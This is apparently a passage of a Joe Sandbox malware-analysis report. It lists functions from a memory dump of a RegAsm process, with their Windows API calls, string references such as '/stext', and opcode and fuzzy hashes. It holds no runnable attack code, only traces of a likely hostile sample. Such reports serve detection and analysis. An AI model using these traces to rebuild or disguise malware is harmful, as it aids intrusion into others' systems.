                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 568699880-0
                                                                                                                                                                                                                      • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                                                      • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                                                                                                                                                      Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                      • String ID: /stext
                                                                                                                                                                                                                      • API String ID: 2081463915-3817206916
                                                                                                                                                                                                                      • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                                                      Function 00409529 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1023896661-0
                                                                                                                                                                                                                      • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                                                                      • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                                                                                                                                                      Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2445788494-0
                                                                                                                                                                                                                      • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                                                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                                                      Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                                                      • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                      • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                      • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                      • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                                                      Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmpmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1065087418-0
                                                                                                                                                                                                                      • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                                                      Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1381354015-0
                                                                                                                                                                                                                      • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                                                                                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                                                      Function 004136C0 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                                                      • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                                                                                                      Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                                        • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                        • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2154303073-0
                                                                                                                                                                                                                      • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                                                      Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                                                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                      Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4232544981-0
                                                                                                                                                                                                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                      Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                                      Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileModuleName
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 514040917-0
                                                                                                                                                                                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                                      Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                      Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                      Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                      • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                                      Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                      Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                      Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
